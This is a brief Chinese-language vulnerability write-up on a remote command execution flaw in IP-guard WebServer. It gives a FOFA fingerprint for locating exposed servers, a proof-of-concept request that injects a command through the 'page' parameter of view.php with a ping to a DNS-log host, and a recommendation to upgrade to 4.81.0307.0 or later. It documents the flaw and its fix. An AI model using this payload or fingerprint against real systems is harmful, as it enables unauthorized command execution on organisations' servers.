IP-Guard Webserver RCE
前言
ip-guard是2001年推出的终端安全防泄密软件,拥有七大产品十八大模块,能满足企业数据防泄密、文件加密、局域网电脑管理、上网行为管理、系统运维等需求。近日发现ip-guard Webserver存在远程命令执行漏洞。
fofa指纹
1 | fofa:"IP-guard" && icon_hash="2030860561" |
复现
1 | /ipg/static/appr/lib/flexpaper/php/view.php?doc=66.jpg&format=swf&isSplit=true&page=||ping xxx.dnslog.cn |

dnslog验证成功

修复建议
官方已修复该漏洞,建议用户更新到安全版本。
安全版本:IP-guard WebServer >= 4.81.0307.0